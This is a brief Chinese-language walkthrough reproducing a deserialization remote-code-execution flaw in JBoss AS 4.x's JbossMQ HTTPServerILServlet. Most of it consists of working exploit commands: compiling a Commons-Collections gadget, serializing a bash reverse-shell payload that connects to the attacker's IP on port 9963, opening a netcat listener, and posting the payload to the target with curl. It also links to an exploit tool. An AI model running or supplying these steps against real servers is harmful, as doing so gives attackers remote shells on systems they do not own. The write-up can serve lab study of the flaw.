原理
JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。
影响版本
JBoss AS 4.x及之前版本
漏洞复现
攻击机:xx.xx.xx.xx
靶机:x.x.x.x
靶机搭建和exp工具-->https://cloud.tencent.com/developer/article/1944746
反弹shell
编译并生成序列化数据,生成ExampleCommonsCollections1WithHashMap.class
文件
javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java
序列化恶意数据至文件,生成ExampleCommonsCollections1WithHashMap.ser
文件
java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "bash -i >& /dev/tcp/xx.xx.xx.xx/9963 0>&1" 注:xx.xx.xx.xx是攻击者IP,端口为反弹shell端口
攻击机监听9963端口
nc -lvnp 9963
把ExampleCommonsCollections1WithHashMap.ser
发送到靶机
curl http://http://x.x.x.x:9700/jbossmq-httpil/HTTPServerILServlet --data-binary @ExampleCommonsCollections1WithHashMap.ser --data-binary 以二进制的方式post数据
发送成功,获取反弹shell。